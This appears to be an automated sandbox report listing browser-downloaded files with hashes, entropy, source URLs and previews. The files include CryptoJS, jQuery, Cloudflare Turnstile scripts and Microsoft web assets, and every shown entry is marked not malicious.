                                                                                                            Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            File Type:HTML document, ASCII text, with very long lines (955), with CRLF line terminators
                                                                                                            Category:downloaded
                                                                                                            Size (bytes):201253
                                                                                                            Entropy (8bit):2.661810841903416
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:W7nJSq9GinOo20uqxjr3+AKyKEAPNPPn8P9R/3htzAVT+JcYY5WRItsWc7rQ3S01:WHGiOoHuOjr3+AKyKAXS
                                                                                                            MD5:85DE642E1467807F64F7E10807DF3869
                                                                                                            SHA1:C795B490811C0E5A1A8F3C3F620AAB9F00C34F07
                                                                                                            SHA-256:5965B2C5472AACA1CD66EA5B0D07A971B961FEE72FC27EB1F6C760042084B21B
                                                                                                            SHA-512:BF4EC56D6FC54EAAFBD57C4E4D06900D358E39CE15009FB983491B0A83ABB60A0A54F46BE86387AB837B4AE1D1F3FF99156D04207065B0F65F165B54CFAAF47B
                                                                                                            Malicious:false
                                                                                                            URL:https://www.microsoft.com/en-us/microsoft-365/sharepoint/collaboration
                                                                                                            Preview:..<!DOCTYPE html><html xmlns:mscom="http://schemas.microsoft.com/CMSvNext".. xmlns:md="http://schemas.microsoft.com/mscom-data" lang="en-us".. xmlns="http://www.w3.org/1999/xhtml"><head><link rel="shortcut icon".. href="//www.microsoft.com/favicon.ico?v2" /><link.. type="text/css" rel="stylesheet".. href="https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.css".. /><title>Your request has been blocked. This could be.. due to several reasons.</title><meta name="Title".. content="We are sorry, the page you requested cannot be.. found" /><meta name="CorrelationVector".. content="VbLZYbRlhU2hyedN.1" /><meta name="Description".. content="" /><meta name="MscomContentLocale".. content="en-us" /><meta name="
                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                                                            Category:downloaded
                                                                                                            Size (bytes):47992
                                                                                                            Entropy (8bit):5.605846858683577
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                                                                            MD5:CF3402D7483B127DED4069D651EA4A22
                                                                                                            SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                                                            SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                                                            SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                                                            Malicious:false
                                                                                                            URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
                                                                                                            Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                            Category:downloaded
                                                                                                            Size (bytes):61
                                                                                                            Entropy (8bit):3.990210155325004
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                            MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                            SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                            SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                            SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                            Malicious:false
                                                                                                            URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                                                                            Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:downloaded
                                                                                                            Size (bytes):15
                                                                                                            Entropy (8bit):3.189898095464287
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Uh1Kn:UDKn
                                                                                                            MD5:39A19D0882684989864FA50BCED6A2D1
                                                                                                            SHA1:5CED55DAC2E0427E9DC605CEC1FEDAB0949EB15E
                                                                                                            SHA-256:8FBEDED073249C3611742297EE96A976A95EE113F33B9A422A5D3A7A2DEB63E5
                                                                                                            SHA-512:E795CB7DE27B42948B7DDFF19F3B401A8F95753AC7D37D9B5F52D8DACD2AA43A2AD9EACEC29F77D28080E20C21C48B9FA88A733FAC108939FB2F0EB036C7AEEE
                                                                                                            Malicious:false
                                                                                                            URL:https://statics-marketingsites-wcus-ms-com.akamaized.net/statics/override.css?c=7
                                                                                                            Preview:/* empty css */
                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            File Type:ASCII text, with very long lines (32089)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):92629
                                                                                                            Entropy (8bit):5.303443527492463
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:dnu00HWWaRxkqJg09pYxoxDKMXJrg8hXXO4dK3kyfiLJBhdSZE+I+Qg7rbaN1RUx:ddkWgoBhcZRQgmW42qe
                                                                                                            MD5:397754BA49E9E0CF4E7C190DA78DDA05
                                                                                                            SHA1:AE49E56999D82802727455F0BA83B63ACD90A22B
                                                                                                            SHA-256:C12F6098E641AACA96C60215800F18F5671039AECF812217FAB3C0D152F6ADB4
                                                                                                            SHA-512:8C64754F77507AB2C24A6FC818419B9DD3F0CECCC9065290E41AFDBEE0743F0DA2CB13B2FBB00AFA525C082F1E697CB3FFD76EF9B902CB81D7C41CA1C641DFFB
                                                                                                            Malicious:false
                                                                                                            Preview:/*! jQuery v1.9.1 | (c) 2005, 2012 jQuery Foundation, Inc. | jquery.org/license.//@ sourceMappingURL=jquery.min.map.*/(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,j=/^-ms-/,D=/-([\da-z])/gi,L=function(e,t){return t.toUpperCase()},H=function(e){(o.addEventListener||"load"===e.type||"complete"===o.readyState)&&(q(),b.ready())},q=function(){o.addEventListener?(o.removeEventListener("DOMContentLoaded",H,!1),e.removeEventListener("load",H,!1)):(o.detachEvent("onreadystatechange",H),e.detachEvent("onload",H)
                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                            Category:downloaded
                                                                                                            Size (bytes):48316
                                                                                                            Entropy (8bit):5.6346993394709
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                            MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                            SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                            SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                            SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                            Malicious:false
                                                                                                            URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                            Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            File Type:ASCII text, with very long lines (47691)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):47692
                                                                                                            Entropy (8bit):5.4016459163756165
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:IXCtQmIutwVHuzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZUanw81KZLGcD:IGJWHuzZBF6xbGfLsVvy33FUaDW
                                                                                                            MD5:9046FDD8B20F930F537279DEDE41E747
                                                                                                            SHA1:EBB905F60D71F45D056D42E6096736EA8C2D4BD9
                                                                                                            SHA-256:5AAC9E52F80011983676C03AD8120E0369E651E6357D0B05054026A3BC8EC32D
                                                                                                            SHA-512:F289C718B32D9E75E5725116D7696070C840426310B2A75E3EE66933E50B85BF738B4015FCFB8BAF7A8545B600B9820D85F8BB41C055FB0877C1420655E5E975
                                                                                                            Malicious:false
                                                                                                            Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            File Type:ASCII text, with very long lines (47691)
                                                                                                            Category:downloaded
                                                                                                            Size (bytes):47692
                                                                                                            Entropy (8bit):5.4016459163756165
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:IXCtQmIutwVHuzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZUanw81KZLGcD:IGJWHuzZBF6xbGfLsVvy33FUaDW
                                                                                                            MD5:9046FDD8B20F930F537279DEDE41E747
                                                                                                            SHA1:EBB905F60D71F45D056D42E6096736EA8C2D4BD9
                                                                                                            SHA-256:5AAC9E52F80011983676C03AD8120E0369E651E6357D0B05054026A3BC8EC32D
                                                                                                            SHA-512:F289C718B32D9E75E5725116D7696070C840426310B2A75E3EE66933E50B85BF738B4015FCFB8BAF7A8545B600B9820D85F8BB41C055FB0877C1420655E5E975
                                                                                                            Malicious:false
                                                                                                            URL:https://challenges.cloudflare.com/turnstile/v0/b/787bc399e22f/api.js
                                                                                                            Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                                                            Category:downloaded
                                                                                                            Size (bytes):4054
                                                                                                            Entropy (8bit):7.797012573497454
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:zICvnyRHJ3BRZPcSPQ72N2xoiR4fTJX/rj4sFNMkk5/p1k2lPUmbm39o4aL7V9XH:10nvE724xoiRQJPrjpLKSFl9oX31Z1d
                                                                                                            MD5:9F14C20150A003D7CE4DE57C298F0FBA
                                                                                                            SHA1:DAA53CF17CC45878A1B153F3C3BF47DC9669D78F
                                                                                                            SHA-256:112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960
                                                                                                            SHA-512:D4F6E49C854E15FE48D6A1F1A03FDA93218AB8FCDB2C443668E7DF478830831ACC2B41DAEFC25ED38FCC8D96C4401377374FED35C36A5017A11E63C8DAE5C487
                                                                                                            Malicious:false
                                                                                                            URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
                                                                                                            Preview:.PNG........IHDR.............J.......tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A00BC639840A11E68CBEB97C2156C7FD" xmpMM:InstanceID="xmp.iid:A00BC638840A11E68CBEB97C2156C7FD" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A2C931A470A111E6AEDFA14578553B7B" stRef:documentID="xmp.did:A2C931A570A111E6AEDFA14578553B7B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......DIDATx..\..UU.>.7..3....h.L..& j2...h.@..".........`U.......R"..Dq.&.BJR 1.4`$.200...l........wg.y.[k/
                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                            Category:dropped
                                                                                                            Size (bytes):17174
                                                                                                            Entropy (8bit):2.9129715116732746
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                            MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                            SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                            SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                            SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                            Malicious:false
                                                                                                            Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            File Type:ASCII text, with very long lines (41651)
                                                                                                            Category:downloaded
                                                                                                            Size (bytes):131537
                                                                                                            Entropy (8bit):5.2237799798561975
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3072:1f/HuF3CpxEIqQ0/9d1EwgXAnKxnKKviV:1f/HuZ1ILGV
                                                                                                            MD5:30B7C335C62E5269E2D35B8E8B9F44B4
                                                                                                            SHA1:C6D92B1516EB8F6D44AAF171FB24A1B2AADD0C4C
                                                                                                            SHA-256:10733A5D876108F81C5F78EEE5C9760A739D89C52FA6180C4290B7F909F24346
                                                                                                            SHA-512:5BCE247C84C88F993A857CE2F1E8540C648672DEB6D92A55BC808C33394B784C52866D635BEC8B7CD5E62A7EA4109569AC8BCD1381571B84592ACD6C5901D7A8
                                                                                                            Malicious:false
                                                                                                            URL:https://www.microsoft.com/onerfstatics/marketingsites-wcus-prod/shell/_scrf/js/themes=default/54-af9f9f/c0-247156/de-099401/e1-a50eee/e7-954872/d8-97d509/f0-251fe2/46-be1318/77-04a268/11-240c7b/63-077520/a4-34de62/1b-c96630/db-bc0148/dc-7e9864/78-4c7d22/e1-c35781/40-7b7803/cd-23d3b0/6d-1e7ed0/b7-cadaa7/ca-40b7b0/4e-ee3a55/3e-f5c39b/c3-6454d7/f9-7592d3/92-10345d/79-499886/7e-cda2d3/db-f3b1fd/93-283c2d/e0-3c9860/91-97a04f/1f-100dea/33-abe4df/19-c0fae7?ver=2.0&iife=1
                                                                                                            Preview:(function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0
                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                            Category:dropped
                                                                                                            Size (bytes):61
                                                                                                            Entropy (8bit):3.990210155325004
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                            MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                            SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                            SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                            SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                            Malicious:false
                                                                                                            Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                            Malicious:false
                                                                                                            Preview:1
                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            File Type:ASCII text, with very long lines (32089)
                                                                                                            Category:downloaded
                                                                                                            Size (bytes):92629
                                                                                                            Entropy (8bit):5.303443527492463
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:dnu00HWWaRxkqJg09pYxoxDKMXJrg8hXXO4dK3kyfiLJBhdSZE+I+Qg7rbaN1RUx:ddkWgoBhcZRQgmW42qe
                                                                                                            MD5:397754BA49E9E0CF4E7C190DA78DDA05
                                                                                                            SHA1:AE49E56999D82802727455F0BA83B63ACD90A22B
                                                                                                            SHA-256:C12F6098E641AACA96C60215800F18F5671039AECF812217FAB3C0D152F6ADB4
                                                                                                            SHA-512:8C64754F77507AB2C24A6FC818419B9DD3F0CECCC9065290E41AFDBEE0743F0DA2CB13B2FBB00AFA525C082F1E697CB3FFD76EF9B902CB81D7C41CA1C641DFFB
                                                                                                            Malicious:false
                                                                                                            URL:https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
                                                                                                            Preview:/*! jQuery v1.9.1 | (c) 2005, 2012 jQuery Foundation, Inc. | jquery.org/license.//@ sourceMappingURL=jquery.min.map.*/(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,j=/^-ms-/,D=/-([\da-z])/gi,L=function(e,t){return t.toUpperCase()},H=function(e){(o.addEventListener||"load"===e.type||"complete"===o.readyState)&&(q(),b.ready())},q=function(){o.addEventListener?(o.removeEventListener("DOMContentLoaded",H,!1),e.removeEventListener("load",H,!1)):(o.detachEvent("onreadystatechange",H),e.detachEvent("onload",H)
                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                                                                            Category:downloaded
                                                                                                            Size (bytes):563851
                                                                                                            Entropy (8bit):5.221453271093944
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:2VR57iqbPXlB5UR5vWenR5xWeMFdBjL+ks0EcU0MWEsuWe5fXbHfxlN/FNCn/Lpl:tTP0BKYtf
                                                                                                            MD5:12DD1E4D0485A80184B36D158018DE81
                                                                                                            SHA1:EB2594062E90E3DCD5127679F9C369D3BF39D61C
                                                                                                            SHA-256:A04B5B8B345E79987621008E6CC9BEF2B684663F9A820A0C7460E727A2A4DDC3
                                                                                                            SHA-512:F3A92BF0C681E6D2198970F43B966ABDF8CCBFF3F9BD5136A1CA911747369C49F8C36C69A7E98E0F2AED3163D9D1C5D44EFCE67A178DE479196845721219E12C
                                                                                                            Malicious:false
                                                                                                            URL:https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.css
                                                                                                            Preview:@charset "UTF-8";/*! @ms-mwf/mwf - v1.25.0+6321934 | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css *
                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            File Type:Web Open Font Format, TrueType, length 26288, version 0.0
                                                                                                            Category:downloaded
                                                                                                            Size (bytes):26288
                                                                                                            Entropy (8bit):7.984195877171481
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:56JqQaQphRbTHiKNF5z/02h5KpJW3pPOA8Y9g/:gdTTH5XKpJWdH1W/
                                                                                                            MD5:D0263DC03BE4C393A90BDA733C57D6DB
                                                                                                            SHA1:8A032B6DEAB53A33234C735133B48518F8643B92
                                                                                                            SHA-256:22B4DF5C33045B645CAFA45B04685F4752E471A2E933BFF5BF14324D87DEEE12
                                                                                                            SHA-512:9511BEF269AE0797ADDF4CD6F2FEC4AD0C4A4E06B3E5BF6138C7678A203022AC4818C7D446D154594504C947DA3061030E82472D2708149C0709B1A070FDD0E3
                                                                                                            Malicious:false
                                                                                                            URL:https://www.microsoft.com/mwf/_h/v3.54/mwf.app/fonts/mwfmdl2-v3.54.woff
